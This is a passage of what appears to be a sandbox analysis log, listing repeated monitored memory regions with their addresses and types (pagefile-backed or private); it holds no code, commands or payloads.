"pagefile_0x0000000001e80000" filename = "" Region: id = 12645 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 12646 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 12647 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 12648 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 12649 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 12650 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 12651 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 12652 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 12653 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 12654 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 12655 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 12656 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 12657 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 12658 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 12659 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 12660 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 12661 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 12662 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 12663 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 12664 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 12665 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 12666 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 12667 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 12668 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 12669 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 12670 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 12671 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 12672 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 12673 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 12674 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 12675 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 12676 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 12677 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 12678 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 12679 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 12680 start_va = 0x610000 end_va = 0x61ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000610000" filename = "" Region: id = 12681 start_va = 0x3d50000 end_va = 0x3d6bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003d50000" filename = "" Region: id = 12682 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 12683 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 12684 start_va = 0x610000 end_va = 0x61ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000610000" filename = "" Region: id = 12685 start_va = 0x3d50000 end_va = 0x3d6bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003d50000" filename = "" Region: id = 12686 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 12687 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 12688 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 12689 start_va = 0x1e80000 end_va = 0x1e8ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001e80000" filename = "" Region: id = 12690 start_va = 0x3d50000 end_va = 0x3d6bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003d50000" filename = "" Region: id = 12691 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 12692 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 12693 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 12694 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 12695 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 12696 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 12697 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 12698 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 12699 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 12700 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 12701 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 12702 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 12703 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 12704 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 12705 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 12706 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 12707 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 12708 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 12709 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 12710 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 12711 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 12712 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 12713 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 12714 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 12715 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 12716 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 12717 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 12718 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 12719 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 12720 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 12721 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 12722 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 12723 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 12724 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 12725 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 12726 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 12727 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 12728 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 12729 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 12730 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 12731 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 12732 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 12733 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 12734 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 12735 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 12736 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 12737 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 12738 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 12739 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 12740 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 12741 start_va = 0x1e80000 end_va = 0x1e8ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001e80000" filename = "" Region: id = 12742 start_va = 0x3d50000 end_va = 0x3d6bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003d50000" filename = "" Region: id = 12743 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 12744 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 12745 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 12746 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 12747 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 12748 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 12749 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 12750 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 12751 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 12752 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 12753 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 12754 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 12755 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 12756 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 12757 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 12758 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 12759 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 12760 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 12761 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 12762 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 12763 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 12764 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 12765 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 12766 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 12767 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 12768 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 12769 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 12770 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 12771 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 12772 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 12773 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 12774 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 12775 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 12776 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 12777 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 12778 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 12779 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 12780 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 12781 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 12782 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 12783 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 12784 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 12785 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 12786 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 12787 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 12788 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 12789 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 12790 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 12791 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 12792 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 12793 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 12794 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 12795 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 12796 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 12797 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 12798 start_va = 0x610000 end_va = 0x61ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000610000" filename = "" Region: id = 12799 start_va = 0x3d50000 end_va = 0x3d6bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003d50000" filename = "" Region: id = 12800 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 12801 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 12802 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 12803 start_va = 0x1e80000 end_va = 0x1e8ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001e80000" filename = "" Region: id = 12804 start_va = 0x3d50000 end_va = 0x3d6bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003d50000" filename = "" Region: id = 12805 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 12806 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 12807 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 12808 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 12809 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 12810 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 12811 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 12812 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 12813 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 12814 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 12815 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 12816 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 12817 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 12818 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 12819 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 12820 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 12821 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 12822 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 12823 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 12824 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 12825 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 12826 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 12827 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 12828 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 12829 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 12830 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" 